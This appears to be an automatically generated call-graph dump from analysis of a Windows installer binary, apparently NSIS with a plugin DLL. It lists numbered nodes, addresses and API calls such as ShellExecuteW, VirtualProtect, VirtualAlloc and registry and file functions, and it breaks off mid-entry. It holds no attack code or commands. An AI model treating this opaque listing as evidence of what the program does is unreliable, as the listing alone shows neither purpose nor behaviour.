402b3a 18 API calls 5209->5210 5211 401e0b 5210->5211 5212 402b3a 18 API calls 5211->5212 5213 401e14 5212->5213 5214 401423 25 API calls 5213->5214 5215 401e1b ShellExecuteW 5214->5215 5216 401e4c 5215->5216 5222 100016b6 5223 100016e5 5222->5223 5224 10001b18 22 API calls 5223->5224 5225 100016ec 5224->5225 5226 100016f3 5225->5226 5227 100016ff 5225->5227 5230 10001272 2 API calls 5226->5230 5228 10001726 5227->5228 5229 10001709 5227->5229 5232 10001750 5228->5232 5233 1000172c 5228->5233 5231 1000153d 3 API calls 5229->5231 5234 100016fd 5230->5234 5236 1000170e 5231->5236 5235 1000153d 3 API calls 5232->5235 5237 100015b4 3 API calls 5233->5237 5235->5234 5238 100015b4 3 API calls 5236->5238 5239 10001731 5237->5239 5240 10001714 5238->5240 5241 10001272 2 API calls 5239->5241 5242 10001272 2 API calls 5240->5242 5243 10001737 GlobalFree 5241->5243 5244 1000171a GlobalFree 5242->5244 5243->5234 5245 1000174b GlobalFree 5243->5245 5244->5234 5245->5234 5246 10002238 5247 10002296 5246->5247 5248 100022cc 5246->5248 5247->5248 5249 100022a8 GlobalAlloc 5247->5249 5249->5247 4734 4026f9 4735 402700 4734->4735 4736 402972 4734->4736 4737 402b1d 18 API calls 4735->4737 4738 40270b 4737->4738 4739 402712 SetFilePointer 4738->4739 4739->4736 4740 402722 4739->4740 4742 405ed3 wsprintfW 4740->4742 4742->4736 5250 1000103d 5251 1000101b 5 API calls 5250->5251 5252 10001056 5251->5252 5253 402c7f 5254 402c91 SetTimer 5253->5254 5255 402caa 5253->5255 5254->5255 5256 402cf8 5255->5256 5257 402cfe MulDiv 5255->5257 5258 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5257->5258 5258->5256 5260 4014ff 5261 401507 5260->5261 5263 40151a 5260->5263 5262 402b1d 18 API calls 5261->5262 5262->5263 5264 401000 5265 401037 BeginPaint GetClientRect 5264->5265 5266 40100c DefWindowProcW 5264->5266 5268 4010f3 5265->5268 5269 401179 5266->5269 5270 401073 CreateBrushIndirect FillRect DeleteObject 5268->5270 5271 4010fc 5268->5271 5270->5268 5272 401102 CreateFontIndirectW 5271->5272 5273 401167 EndPaint 5271->5273 5272->5273 5274 401112 6 API calls 5272->5274 5273->5269 5274->5273 5275 401a00 5276 402b3a 18 API calls 5275->5276 5277 401a09 ExpandEnvironmentStringsW 5276->5277 5278 401a1d 5277->5278 5280 401a30 5277->5280 5279 401a22 lstrcmpW 5278->5279 5278->5280 5279->5280 5288 401b01 5289 402b3a 18 API calls 5288->5289 5290 401b08 5289->5290 5291 402b1d 18 API calls 5290->5291 5292 401b11 wsprintfW 5291->5292 5293 4029c7 5292->5293 4268 100027c7 4269 10002817 4268->4269 4270 100027d7 VirtualProtect 4268->4270 4270->4269 5294 401f08 5295 402b3a 18 API calls 5294->5295 5296 401f0f GetFileVersionInfoSizeW 5295->5296 5297 401f36 GlobalAlloc 5296->5297 5299 401f8c 5296->5299 5298 401f4a GetFileVersionInfoW 5297->5298 5297->5299 5298->5299 5300 401f59 VerQueryValueW 5298->5300 5300->5299 5301 401f72 5300->5301 5305 405ed3 wsprintfW 5301->5305 5303 401f7e 5306 405ed3 wsprintfW 5303->5306 5305->5303 5306->5299 5307 40498a 5308 4049b6 5307->5308 5309 40499a 5307->5309 5311 4049e9 5308->5311 5312 4049bc SHGetPathFromIDListW 5308->5312 5318 40574c GetDlgItemTextW 5309->5318 5314 4049d3 SendMessageW 5312->5314 5315 4049cc 5312->5315 5313 4049a7 SendMessageW 5313->5308 5314->5311 5316 40140b 2 API calls 5315->5316 5316->5314 5318->5313 5319 401c8e 5320 402b1d 18 API calls 5319->5320 5321 401c94 IsWindow 5320->5321 5322 4019f0 5321->5322 5323 1000164f 5324 10001516 GlobalFree 5323->5324 5326 10001667 5324->5326 5325 100016ad GlobalFree 5326->5325 5327 10001682 5326->5327 5328 10001699 VirtualFree 5326->5328 5327->5325 5328->5325 5329 401491 5330 405234 25 API calls 5329->5330 5331 401498 5330->5331 4536 402295 4537 402b3a 18 API calls 4536->4537 4538 4022a4 4537->4538 4539 402b3a 18 API calls 4538->4539 4540 4022ad 4539->4540 4541 402b3a 18 API calls 4540->4541 4542 4022b7 GetPrivateProfileStringW 4541->4542 4548 401f98 4549 40205c 4548->4549 4550 401faa 4548->4550 4553 401423 25 API calls 4549->4553 4551 402b3a 18 API calls 4550->4551 4552 401fb1 4551->4552 4554 402b3a 18 API calls 4552->4554 4558 402197 4553->4558 4555 401fba 4554->4555 4556 401fd0 LoadLibraryExW 4555->4556 4557 401fc2 GetModuleHandleW 4555->4557 4556->4549 4559 401fe1 4556->4559 4557->4556 4557->4559 4571 406362 WideCharToMultiByte 4559->4571 4562 401ff2 4565 402011 4562->4565 4566 401ffa 4562->4566 4563 40202b 4564 405234 25 API calls 4563->4564 4567 402002 4564->4567 4574 10001759 4565->4574 4616 401423 4566->4616 4567->4558 4569 40204e FreeLibrary 4567->4569 4569->4558 4572 40638c GetProcAddress 4571->4572 4573 401fec 4571->4573 4572->4573 4573->4562 4573->4563 4575 10001789 4574->4575 4619 10001b18 4575->4619 4577 10001790 4578 100018a6 4577->4578 4579 100017a1 4577->4579 4580 100017a8 4577->4580 4578->4567 4668 10002286 4579->4668 4651 100022d0 4580->4651 4585 1000180c 4589 10001812 4585->4589 4590 1000184e 4585->4590 4586 100017ee 4681 100024a9 4586->4681 4587 100017d7 4599 100017cd 4587->4599 4678 10002b5f 4587->4678 4588 100017be 4592 100017c4 4588->4592 4598 100017cf 4588->4598 4594 100015b4 3 API calls 4589->4594 4596 100024a9 10 API calls 4590->4596 4592->4599 4662 100028a4 4592->4662 4601 10001828 4594->4601 4602 10001840 4596->4602 4597 100017f4 4692 100015b4 4597->4692 4672 10002645 4598->4672 4599->4585 4599->4586 4605 100024a9 10 API calls 4601->4605 4615 10001895 4602->4615 4703 1000246c 4602->4703 4604 100017d5 4604->4599 4605->4602 4609 1000189f GlobalFree 4609->4578 4612 10001881 4612->4615 4707 1000153d wsprintfW 4612->4707 4613 1000187a FreeLibrary 4613->4612 4615->4578 4615->4609 4617 405234 25 API calls 4616->4617 4618 401431 4617->4618 4618->4567 4710 1000121b GlobalAlloc 4619->4710 4621 10001b3c 4711 1000121b GlobalAlloc 4621->4711 4623 10001d7a GlobalFree GlobalFree GlobalFree 4624 10001d97 4623->4624 4643 10001de1 4623->4643 4625 100020ee 4624->4625 4634 10001dac 4624->4634 4624->4643 4627 10002110 GetModuleHandleW 4625->4627 4625->4643 4626 10001c1d GlobalAlloc 4647 10001b47 4626->4647 4629 10002121 LoadLibraryW 4627->4629 4630 10002136 4627->4630 4628 10001c86 GlobalFree 4628->4647 4629->4630 4629->4643 4718 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4630->4718 4631 10001c68 lstrcpyW 4632 10001c72 lstrcpyW 4631->4632 4632->4647 4634->4643 4714 1000122c 4634->4714 4635 10002188 4637 10002195 lstrlenW 4635->4637 4635->4643 4719 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4637->4719 4638 10002148 4638->4635 4650 10002172 GetProcAddress 4638->4650 4639 10002048 4642 10002090 lstrcpyW 4639->4642 4639->4643 4642->4643 4643->4577 4644 10001cc4 4644->4647 4712 1000158f GlobalSize GlobalAlloc 4644->4712 4645 10001f37 GlobalFree 4645->4647 4646 100021af 4646->4643 4647->4623 4647->4626 4647->4628 4647->4631 4647->4632 4647->4639 4647->4643 4647->4644 4647->4645 4648 1000122c 2 API calls 4647->4648 4717 1000121b GlobalAlloc 4647->4717 4648->4647 4650->4635 4653 100022e8 4651->4653 4652 1000122c GlobalAlloc lstrcpynW 4652->4653 4653->4652 4655 10002415 GlobalFree 4653->4655 4657 100023d3 lstrlenW 4653->4657 4658 100023ba GlobalAlloc CLSIDFromString 4653->4658 4659 1000238f GlobalAlloc WideCharToMultiByte 4653->4659 4721 100012ba 4653->4721 4655->4653 4656 100017ae 4655->4656 4656->4587 4656->4588 4656->4599 4657->4655 4661 100023de 4657->4661 4658->4655 4659->4655 4661->4655 4725 100025d9 4661->4725 4663 100028b6 4662->4663 4664 1000295b SetFilePointer 4663->4664 4665 10002979 4664->4665 4666 10002a75 4665->4666 4667 10002a6a GetLastError 4665->4667 4666->4599 4667->4666 4669 10002296 4668->4669 4671 100017a7 4668->4671 4670 100022a8 GlobalAlloc 4669->4670 4669->4671 4670->4669 4671->4580 4673 10002661 4672->4673 4674 100026b2 GlobalAlloc 4673->4674 4675 100026c5 4673->4675 4677 100026d4 4674->4677 4676 100026ca GlobalSize 4675->4676 4675->4677 4676->4677 4677->4604 4679 10002b6a 4678->4679 4680 10002baa GlobalFree 4679->4680 4728 1000121b GlobalAlloc 4681->4728 4683 10002530 StringFromGUID2 4688 100024b3 4683->4688 4684 10002541 lstrcpynW 4684->4688 4685 1000250b MultiByteToWideChar 4685->4688 4686 10002571 GlobalFree 4686->4688 4687 10002554 wsprintfW 4687->4688 4688->4683 4688->4684 4688->4685 4688->4686 4688->4687 4689 100025ac GlobalFree 4688->4689 4690 10001272 2 API calls 4688->4690 4729 100012e1 4688->4729 4689->4597 4690->4688 4733 1000121b GlobalAlloc 4692->4733 4694 100015ba 4695 100015c7 lstrcpyW 4694->4695 4697 100015e1 4694->4697 4698 100015fb 4695->4698 4697->4698 4699 100015e6 wsprintfW 4697->4699 4700 10001272 4698->4700 4699->4698 4701 100012b5 GlobalFree 4700->4701 4702 1000127b GlobalAlloc lstrcpynW 4700->4702 4701->4602 4702->4701 4704 1000247a 4703->4704 4706 10001861 4703->4706 4705 10002496 GlobalFree 4704->4705 4704->4706 4705->4704 4706->4612 4706->4613 4708 10001272 2 API calls 4707->4708 4709 1000155e 4708->4709 4709->4615 4710->4621 4711->4647 4713 100015ad 4712->4713 4713->4644 4720 1000121b GlobalAlloc 4714->4720 4716 1000123b lstrcpynW 4716->4643 4717->4647 4718->4638 4719->4646 4720->4716 4722 100012c1 4721->4722 4723 1000122c 2 API calls 4722->4723 4724 100012df 4723->4724 4724->4653 4726 100025e7 VirtualAlloc 4725->4726 4727 1000263d 4725->4727 4726->4727 4727->4661 4728->4688 4730 100012ea 4729->4730 4731 1000130c 4729->4731 4730->4731 4732 100012f0 lstrcpyW 4730->4732 4731->4688 4732->4731 4733->4694 5346 10001058 5348 10001074 5346->5348 5347 100010dd 5348->5347 5349 10001516 GlobalFree 5348->5349 5350 10001092 5348->5350 5349->5350 5351 10001516 GlobalFree 5350->5351 5352 100010a2 5351->5352 5353 100010b2 5352->5353 5354 100010a9 GlobalSize 5352->5354 5355 100010b6 GlobalAlloc 5353->5355 5356 100010c7 5353->5356 5354->5353 5357 1000153d 3 API calls 5355->5357 5358 100010d2 GlobalFree 5356->5358 5357->5356 5358->5347 5359 401718 5360 402b3a 18 API calls 5359->5360 5361 40171f SearchPathW 5360->5361 5362 40173a 5361->5362 4970 40159b 4971 402b3a 18 API calls 4970->4971 4972 4015a2 SetFileAttributesW 4971->4972 4973 4015b4 4972->4973 5363 40149e 5364 4014ac PostQuitMessage 5363->5364 5365 40223e 5363->5365 5364->5365 5373 4021a0 5374 402b3a 18 API calls 5373->5374 5375 4021a6 5374->5375 5376 402b3a 18 API calls 5375->5376 5377 4021af 5376->5377 5378 402b3a 18 API calls 5377->5378 5379 4021b8 5378->5379 5380 4062cf 2 API calls 5379->5380 5381 4021c1 5380->5381 5382 4021d2 lstrlenW lstrlenW 5381->5382 5386 4021c5 5381->5386 5384 405234 25 API calls 5382->5384 5383 405234 25 API calls 5387 4021cd 5383->5387 5385 402210 SHFileOperationW 5384->5385 5385->5386 5385->5387 5386->5383 5386->5387 5388 100010e1 5389 10001111 5388->5389 5390 100011d8 GlobalFree 5389->5390 5391 100012ba 2 API calls 5389->5391 5392 100011d3 5389->5392 5393 100011f8 GlobalFree 5389->5393 5394 10001272 2 API calls 5389->5394 5395 10001164 GlobalAlloc 5389->5395 5396 100012e1 lstrcpyW 5389->5396 5397 100011c4 GlobalFree 5389->5397 5391->5389 5392->5390 5393->5389 5394->5397 5395->5389 5396->5389 5397->5389 5398 401b22 5399 401b73 5398->5399 5400 401b2f 5398->5400 5401 401b78 5399->5401 5402 401b9d GlobalAlloc 5399->5402 5403 401bb8 5400->5403 5407 401b46 5400->5407 5408 40223e 5401->5408 5419 405f8c lstrcpynW 5401->5419 5404 405fae 18 API calls 5402->5404 5405 405fae 18 API calls 5403->5405 5403->5408 5404->5403 5410 402238 5405->5410 5417 405f8c lstrcpynW 5407->5417 5409 401b8a GlobalFree 5409->5408 5412 405768 MessageBoxIndirectW 5410->5412 5412->5408 5413 401b55 5418 405f8c lstrcpynW 5413->5418 5415 401b64 5420 405f8c lstrcpynW 5415->5420 5417->5413 5418->5415 5419->5409 5420->5408 5421 4029a2 SendMessageW 5422 4029bc InvalidateRect 5421->5422 5423 4029c7 5421->5423 5422->5423 4117 401924 4118 401926 4117->4118 4119 402b3a 18 API calls 4118->4119 4120 40192b 4119->4120 4123 405814 4120->4123 4159 405adf 4123->4159 4126 40583c DeleteFileW 4131 401934 4126->4131 4127 405853 4128 405973 4127->4128 4173 405f8c lstrcpynW 4127->4173 4128->4131 4203 4062cf FindFirstFileW 4128->4203 4130 405879 4132 40588c 4130->4132 4133 40587f lstrcatW 4130->4133 4194 405a23 lstrlenW 4132->4194 4135 405892 4133->4135 4137 4058a2 lstrcatW 4135->4137 4139 4058ad lstrlenW FindFirstFileW 4135->4139 4137->4139 4139->4128 4157 4058cf 4139->4157 4142 405956 FindNextFileW 4146 40596c FindClose 4142->4146 4142->4157 4143 4057cc 5 API calls 4145 4059ae 4143->4145 4147 4059b2 4145->4147 4148 4059c8 4145->4148 4146->4128 4147->4131 4151 405234 25 API calls 4147->4151 4149 405234 25 API calls 4148->4149 4149->4131 4153 4059bf 4151->4153 4152 405814 64 API calls 4152->4157 4155 405e26 40 API calls 4153->4155 4155->4131 4156 405234 25 API calls 4156->4157 4157->4142 4157->4152 4157->4156 4174 405f8c lstrcpynW 4157->4174 4175 4057cc 4157->4175 4183 405234 4157->4183 4198 405e26 4157->4198 4209 405f8c lstrcpynW 4159->4209 4161 405af0 4210 405a82 CharNextW CharNextW 4161->4210 4164 405834 4164->4126 4164->4127 4165 406220 5 API calls 4171 405b06 4165->4171 4166 405b37 lstrlenW 4167 405b42 4166->4167 4166->4171 4169 4059d7 3 API calls 4167->4169 4168 4062cf 2 API calls 4168->4171 4170 405b47 GetFileAttributesW 4169->4170 4170->4164 4171->4164 4171->4166 4171->4168 4172 405a23 2 API calls 4171->4172 4172->4166 4173->4130 4174->4157 4216 405bd3 GetFileAttributesW 4175->4216 4178 4057f9 4178->4157 4179 4057e7 RemoveDirectoryW 4181 4057f5 4179->4181 4180 4057ef DeleteFileW 4180->4181 4181->4178 4182 405805 SetFileAttributesW 4181->4182 4182->4178 4184 4052f1 4183->4184 4185 40524f 4183->4185 4184->4142 4186 40526b lstrlenW 4185->4186 4187 405fae 18 API calls 4185->4187 4188 405294 4186->4188 4189 405279 lstrlenW 4186->4189 4187->4186 4191 4052a7 4188->4191 4192 40529a SetWindowTextW 4188->4192 4189->4184 4190 40528b lstrcatW 4189->4190 4190->4188 4191->4184 4193 4052ad SendMessageW SendMessageW SendMessageW 4191->4193 4192->4191 4193->4184 4195 405a31 4194->4195 4196 405a43 4195->4196 4197 405a37 CharPrevW 4195->4197 4196->4135 4197->4195 4197->4196 4219 4062f6 GetModuleHandleA 4198->4219 4202 405e4e 4202->4157 4204 405998 4203->4204 4205 4062e5 FindClose 4203->4205 4204->4131 4206 4059d7 lstrlenW CharPrevW 4204->4206 4205->4204 4207 4059f3 lstrcatW 4206->4207 4208 4059a2 4206->4208 4207->4208 4208->4143 4209->4161 4211 405a9f 4210->4211 4213 405ab1 4210->4213 4211->4213 4214 405aac CharNextW 4211->4214 4212 405ad5 4212->4164 4212->4165 4213->4212 4215 405a04 CharNextW 4213->4215 4214->4212 4215->4213 4217 4057d8 4216->4217 4218 405be5 SetFileAttributesW 4216->4218 4217->4178 4217->4179 4217->4180 4218->4217 4220 406312 LoadLibraryA 4219->4220 4221 40631d GetProcAddress 4219->4221 4220->4221 4222 405e2d 4220->4222 4221->4222 4222->4202 4223 405caa lstrcpyW 4222->4223 4224 405cd3 4223->4224 4225 405cf9 GetShortPathNameW 4223->4225 4248 405bf8 GetFileAttributesW CreateFileW 4224->4248 4227 405e20 4225->4227 4228 405d0e 4225->4228 4227->4202 4228->4227 4230 405d16 wsprintfA 4228->4230 4229 405cdd CloseHandle GetShortPathNameW 4229->4227 4232 405cf1 4229->4232 4231 405fae 18 API calls 4230->4231 4233 405d3e 4231->4233 4232->4225 4232->4227 4249 405bf8 GetFileAttributesW CreateFileW 4233->4249 4235 405d4b 4235->4227 4236 405d5a GetFileSize GlobalAlloc 4235->4236 4237 405e19 CloseHandle 4236->4237 4238 405d7c 4236->4238 4237->4227 4250 405c7b ReadFile 4238->4250 4243 405d9b lstrcpyA 4245 405dbd 4243->4245 4244 405daf 4246 405b5d 4 API calls 4244->4246 4247 405df4 SetFilePointer WriteFile GlobalFree 4245->4247 4246->4245 4247->4237 4248->4229 4249->4235 4251 405c99 4250->4251 4251->4237 4252 405b5d lstrlenA 4251->4252 4253 405b9e lstrlenA 4252->4253 4254 405ba6 4253->4254 4255 405b77 lstrcmpiA 4253->4255 4254->4243 4254->4244 4255->4254 4256 405b95 CharNextA 4255->4256 4256->4253 5424 402224 5425 40222b 5424->5425 5428 40223e 5424->5428 5426 405fae 18 API calls 5425->5426 5427 402238 5426->5427 5429 405768 MessageBoxIndirectW 5427->5429 5429->5428 5430 4051a8 5431 4051b8 5430->5431 5432 4051cc 5430->5432 5433 405215 5431->5433 5434 4051be 5431->5434 5435 4051d4 IsWindowVisible 5432->5435 5441 4051eb 5432->5441 5438 40521a CallWindowProcW 5433->5438 5436 4041e6 SendMessageW 5434->5436 5435->5433 5437 4051e1 5435->5437 5439 4051c8 5436->5439 5443 404afe SendMessageW 5437->5443 5438->5439 5441->5438 5448 404b7e 5441->5448 5444 404b21 GetMessagePos ScreenToClient SendMessageW 5443->5444 5445 404b5d SendMessageW 5443->5445 5446 404b55 5444->5446 5447 404b5a 5444->5447 5445->5446 5446->5441 5447->5445 5457 405f8c lstrcpynW 5448->5457 5450 404b91 5458 405ed3 wsprintfW 5450->5458 5452 404b9b 5453 40140b 2 API calls 5452->5453 5454 404ba4 5453->5454 5459 405f8c lstrcpynW 5454->5459 5456 404bab 5456->5433 5457->5450 5458->5452 5459->5456 5460 402729 5461 402730 5460->5461 5462 4029c7 5460->5462 5463 402736 FindClose 5461->5463 5463->5462 5464 401cab 5465 402b1d 18 API calls 5464->5465 5466 401cb2 5465->5466 5467 402b1d 18 API calls 5466->5467 5468 401cba GetDlgItem 5467->5468 5469 4024e8 5468->5469 5477 4042ae lstrcpynW lstrlenW 5478 4016af 5479 402b3a 18 API calls 5478->5479 5480 4016b5 GetFullPathNameW 5479->5480 5481 4016f1 5480->5481 5482 4016cf 5480->5482 5483 401706 GetShortPathNameW 5481->5483 5484 4029c7 5481->5484 5482->5481 5485 4062cf 2 API calls 5482->5485 5483->5484 5486 4016e1 5485->5486 5486->5481 5488 405f8c lstrcpynW 5486->5488 5488->5481 5489 404bb0 GetDlgItem GetDlgItem 5490 404c02 7 API calls 5489->5490 5493 404e1b 5489->5493 5491 404ca5 DeleteObject 5490->5491 5492 404c98 SendMessageW 5490->5492 5494 404cae 5491->5494 5492->5491 5507 404afe 5 API calls 5493->5507 5512 404eff 5493->5512 5521 404e8c 5493->5521 5495 404ce5 5494->5495 5496 405fae 18 API calls 5494->5496 5497 40419a 19 API calls 5495->5497 5500 404cc7 SendMessageW SendMessageW 5496->5500 5503 404cf9 5497->5503 5498 404fab 5501 404fb5 SendMessageW 5498->5501 5502 404fbd 5498->5502 5499 404e0e 5505 404201 8 API calls 5499->5505 5500->5494 5501->5502 5513 404fd6 5502->5513 5514 404fcf ImageList_Destroy 5502->5514 5518 404fe6 5502->5518 5508 40419a 19 API calls 5503->5508 5504 404f58 SendMessageW 5504->5499 5510 404f6d SendMessageW 5504->5510 5511 4051a1 5505->5511 5506 404ef1 SendMessageW 5506->5512 5507->5521 5522 404d07 5508->5522 5509 405155 5509->5499 5519 405167 ShowWindow GetDlgItem ShowWindow 5509->5519 5516 404f80 5510->5516 5512->5498 5512->5499 5512->5504 5517 404fdf GlobalFree 5513->5517 5513->5518 5514->5513 5515 404ddc GetWindowLongW SetWindowLongW 5520 404df5 5515->5520 5526 404f91 SendMessageW 5516->5526 5517->5518 5518->5509 5532 404b7e 4 API calls 5518->5532 5535 405021 5518->5535 5519->5499 5523 404e13 5520->5523 5524 404dfb ShowWindow 5520->5524 5521->5506 5521->5512 5522->5515 5525 404d57 SendMessageW 5522->5525 5527 404dd6 5522->5527 5530 404d93 SendMessageW 5522->5530 5531 404da4 SendMessageW 5522->5531 5541 4041cf SendMessageW 5523->5541 5540 4041cf SendMessageW 5524->5540 5525->5522 5526->5498 5527->5515 5527->5520 5530->5522 5531->5522 5532->5535 5533 40512b InvalidateRect 5533->5509 5534 405141 5533->5534 5542 404ab9 5534->5542 5536 40504f SendMessageW 5535->5536 5539 405065 5535->5539 5536->5539 5538 4050d9 SendMessageW SendMessageW 5538->5539 5539->5533 5539->5538 5540->5499 5541->5493 5545 4049f0 5542->5545 5544 404ace 5544->5509 5546 404a09 5545->5546 5547 405fae 18 API calls 5546->5547 5548 404a6d 5547->5548 5549 405fae 18 API calls 5548->5549 5550 404a78 5549->5550 5551 405fae 18 API calls 5550->5551 5552 404a8e lstrlenW wsprintfW SetDlgItemTextW 5551->5552 5552->5544 4315 402331 4316 402337 4315->4316 4317 402b3a 18 API calls 4316->4317 4318 402349 4317->4318 4319 402b3a 18 API calls 4318->4319 4320 402353 RegCreateKeyExW 4319->4320 4321 402793 4320->4321 4322 40237d 4320->4322 4323 402398 4322->4323 4324 402b3a 18 API calls 4322->4324 4325 4023a4 4323->4325 4328 402b1d 18 API calls 4323->4328 4327 40238e lstrlenW 4324->4327 4326 4023bf RegSetValueExW 4325->4326 4332 403062 4325->4332 4330 4023d5 RegCloseKey 4326->4330 4327->4323 4328->4325 4330->4321 4333 403072 SetFilePointer 4332->4333 4334 40308e 4332->4334 4333->4334 4347 40317d GetTickCount 4334->4347 4337 403139 4337->4326 4338 405c7b ReadFile 4339 4030ae 4338->4339 4339->4337 4340 40317d 43 API calls 4339->4340 4341 4030c5 4340->4341 4341->4337 4342 40313f ReadFile 4341->4342 4344 4030d5 4341->4344 4342->4337 4344->4337 4345 405c7b ReadFile 4344->4345 4346 403108 WriteFile 4344->4346 4345->4344 4346->4337 4346->4344 4348 4032e7 4347->4348 4349 4031ac 4347->4349 4350 402d1a 33 API calls 4348->4350 4360 40330f SetFilePointer 4349->4360 4357 403095 4350->4357 4352 4031b7 SetFilePointer 4356 4031dc 4352->4356 4356->4357 4358 403271 WriteFile 4356->4358 4359 4032c8 SetFilePointer 4356->4359 4361 4032f9 4356->4361 4364 406432 4356->4364 4371 402d1a 4356->4371 4357->4337 4357->4338 4358->4356 4358->4357 4359->4348 4360->4352 4362 405c7b ReadFile 4361->4362 4363 40330c 4362->4363 4363->4356 4365 406457 4364->4365 4366 40645f 4364->4366 4365->4356 4366->4365 4367 4064e6 GlobalFree 4366->4367 4368 4064ef GlobalAlloc 4366->4368 4369 406566 GlobalAlloc 4366->4369 4370 40655d GlobalFree 4366->4370 4367->4368 4368->4365 4368->4366 4369->4365 4369->4366 4370->4369 4372 402d43 4371->4372 4373 402d2b 4371->4373 4376 402d53 GetTickCount 4372->4376 4377 402d4b 4372->4377 4374 402d34 DestroyWindow 4373->4374 4375 402d3b 4373->4375 4374->4375 4375->4356 4376->4375 4378 402d61 4376->4378 4379 40632f 2 API calls 4377->4379 4380 402d96 CreateDialogParamW ShowWindow 4378->4380 4381 402d69 4378->4381 4379->4375 4380->4375 4381->4375 4386 402cfe 4381->4386 4383 402d77 wsprintfW 4384 405234 25 API calls 4383->4384 4385 402d94 4384->4385 4385->4375 4387 402d0d 4386->4387 4388 402d0f MulDiv 4386->4388 4387->4388 4388->4383 5553 404635 5554 404661 5553->5554 5555 404672 5553->5555 5614 40574c GetDlgItemTextW 5554->5614 5557 40467e GetDlgItem 5555->5557 5562 4046dd 5555->5562 5559 404692 5557->5559 5558 40466c 5561 406220 5 API calls 5558->5561 5564 4046a6 SetWindowTextW 5559->5564 5569 405a82 4 API calls 5559->5569 5560 4047c1 5611 40496f 5560->5611 5616 40574c GetDlgItemTextW 5560->5616 5561->5555 5562->5560 5566 405fae 18 API calls 5562->5566 5562->5611 5567 40419a 19 API calls 5564->5567 5565 4047f1 5570 405adf 18 API calls 5565->5570 5571 404751 SHBrowseForFolderW 5566->5571 5572 4046c2 5567->5572 5568 404201 8 API calls 5573 404983 5568->5573 5574 40469c 5569->5574 5575 4047f7 5570->5575 5571->5560 5576 404769 CoTaskMemFree 5571->5576 5577 40419a 19 API calls 5572->5577 5574->5564 5578 4059d7 3 API calls 5574->5578 5617 405f8c lstrcpynW 5575->5617 5579 4059d7 3 API calls 5576->5579 5580 4046d0 5577->5580 5578->5564 5581 404776 5579->5581 5615 4041cf SendMessageW 5580->5615 5584 4047ad SetDlgItemTextW 5581->5584 5589 405fae 18 API calls 5581->5589 5584->5560 5585 4046d6 5587 4062f6 3 API calls 5585->5587 5586 40480e 5588 4062f6 3 API calls 5586->5588 5587->5562 5596 404816 5588->5596 5590 404795 lstrcmpiW 5589->5590 5590->5584 5593 4047a6 lstrcatW 5590->5593 5591 404855 5618 405f8c lstrcpynW 5591->5618 5593->5584 5594 40485e 5595 405a82 4 API calls 5594->5595 5597 404864 GetDiskFreeSpaceW 5595->5597 5596->5591 5599 405a23 2 API calls 5596->5599 5601 4048ad 5596->5601 5600 404886 MulDiv 5597->5600 5597->5601 5599->5596 5600->5601 5602 404ab9 21 API calls 5601->5602 5612 40491e 5601->5612 5604 40490b 5602->5604 5603 40140b 2 API calls 5605 404941 5603->5605 5607 404920 SetDlgItemTextW 5604->5607 5608 404910 5604->5608 5619 4041bc KiUserCallbackDispatcher 5605->5619 5607->5612 5610 4049f0 21 API calls 5608->5610 5609 40495d 5609->5611 5620 4045ca 5609->5620 5610->5612 5611->5568 5612->5603 5612->5605 5614->5558 5615->5585 5616->5565 5617->5586 5618->5594 5619->5609 5621 4045d8 5620->5621 5622 4045dd SendMessageW 5620->5622 5621->5622 5622->5611 5623 4027b5 5624 402b3a 18 API calls 5623->5624 5625 4027c3 5624->5625 5626 4027d9 5625->5626 5627 402b3a 18 API calls 5625->5627 5628 405bd3 2 API calls 5626->5628 5627->5626 5629 4027df 5628->5629 5649 405bf8 GetFileAttributesW CreateFileW 5629->5649 5631 4027ec 5632 402895 5631->5632 5633 4027f8 GlobalAlloc 5631->5633 5636 4028b0 5632->5636 5637 40289d DeleteFileW 5632->5637 5634 402811 5633->5634 5635 40288c CloseHandle 5633->5635 5650 40330f SetFilePointer 5634->5650 5635->5632 5637->5636 5639 402817 5640 4032f9 ReadFile 5639->5640 5641 402820 GlobalAlloc 5640->5641 5642 402830 5641->5642 5643 402864 WriteFile GlobalFree 5641->5643 5644 403062 46 API calls 5642->5644 5645 403062 46 API calls 5643->5645 5648 40283d 5644->5648 5646 402889 5645->5646 5646->5635 5647 40285b GlobalFree 5647->5643 5648->5647 5649->5631 5650->5639 5651 4028b6 5652 402b1d 18 API calls 5651->5652 5653 4028bc 5652->5653 5654 4028f8 5653->5654 5655 4028df 5653->5655 5659 402793 5653->5659 5657 402902 5654->5657 5658 40290e 5654->5658 5656 4028e4 5655->5656 5664 4028f5 5655->5664 5665 405f8c lstrcpynW 5656->5665 5660 402b1d 18 API calls 5657->5660 5661 405fae 18 API calls 5658->5661 5660->5664 5661->5664 5664->5659 5666 405ed3 wsprintfW 5664->5666 5665->5659 5666->5659 5667 404337 5669 404469 5667->5669 5670 40434f 5667->5670 5668 4044d3 5671 4045a5 5668->5671 5672 4044dd GetDlgItem 5668->5672 5669->5668 5669->5671 5676 4044a4 GetDlgItem SendMessageW 5669->5676 5675 40419a 19 API calls 5670->5675 5678 404201 8 API calls 5671->5678 5673 404566 5672->5673 5674 4044f7 5672->5674 5673->5671 5680 404578 5673->5680 5674->5673 5679 40451d 6 API calls 5674->5679 5677 4043b6 5675->5677 5698 4041bc KiUserCallbackDispatcher 5676->5698 5682 40419a 19 API calls 5677->5682 5683 4045a0 5678->5683 5679->5673 5684 40458e 5680->5684 5685 40457e SendMessageW 5680->5685 5687 4043c3 CheckDlgButton 5682->5687 5684->5683 5689 404594 SendMessageW 5684->5689 5685->5684 5686 4044ce 5690 4045ca SendMessageW 5686->5690 5696 4041bc KiUserCallbackDispatcher 5687->5696 5689->5683 5690->5668 5691 4043e1 GetDlgItem 5697 4041cf SendMessageW 5691->5697 5693 4043f7 SendMessageW 5694 404414 GetSysColor 5693->5694 5695 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5693->5695 5694->5695 5695->5683 5696->5691 5697->5693 5698->5686 5699 4014b8 5700 4014be 5699->5700 5701 401389 2 API calls 5700->5701 5702 4014c6 5701->5702 4743 4015b9 4744 402b3a 18 API calls 4743->4744 4745 4015c0 4744->4745 4746 405a82 4 API calls 4745->4746 4747 4015c9 4746->4747 4748 401614 4747->4748 4749 405a04 CharNextW 4747->4749 4750 401646 4748->4750 4751 401619 4748->4751 4752 4015d7 CreateDirectoryW 4749->4752 4754 401423 25 API calls 4750->4754 4753 401423 25 API calls 4751->4753 4752->4747 4755 4015ed GetLastError 4752->4755 4756 